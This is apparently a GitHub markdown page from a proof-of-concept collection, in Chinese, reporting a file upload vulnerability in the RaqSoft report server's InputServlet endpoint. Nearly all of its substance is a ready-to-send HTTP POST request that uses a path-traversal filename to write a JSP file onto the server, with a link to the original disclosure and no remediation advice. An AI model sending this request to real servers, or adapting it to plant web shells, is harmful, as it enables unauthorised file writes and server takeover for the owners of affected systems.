润乾报表InputServlet接口存在文件上传漏洞

环境：https://github.com/charlesvhe/raqsoft

poc

POST /InputServlet?action=12 HTTP/1.1
Host: 127.0.0.1:8080
Content-Type: multipart/form-data; boundary=--------------------------170005680039721412137562
Accept-Encoding: gzip, deflate, br
Content-Length: 2401

----------------------------170005680039721412137562
Content-Disposition: form-data; name="upsize"

1024
----------------------------170005680039721412137562
Content-Disposition: form-data; name="file"; filename="/\..\\..\2.jsp"
Content-Type: image/png

11111
----------------------------170005680039721412137562--

漏洞来源

https://mp.weixin.qq.com/s/-u1fn_q4e-YhJUEqwNG1Zg

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

润乾报表InputServlet接口存在文件上传漏洞.md

润乾报表InputServlet接口存在文件上传漏洞.md

润乾报表InputServlet接口存在文件上传漏洞

poc

漏洞来源

Files

润乾报表InputServlet接口存在文件上传漏洞.md

Latest commit

History

润乾报表InputServlet接口存在文件上传漏洞.md

File metadata and controls

润乾报表InputServlet接口存在文件上传漏洞

poc

漏洞来源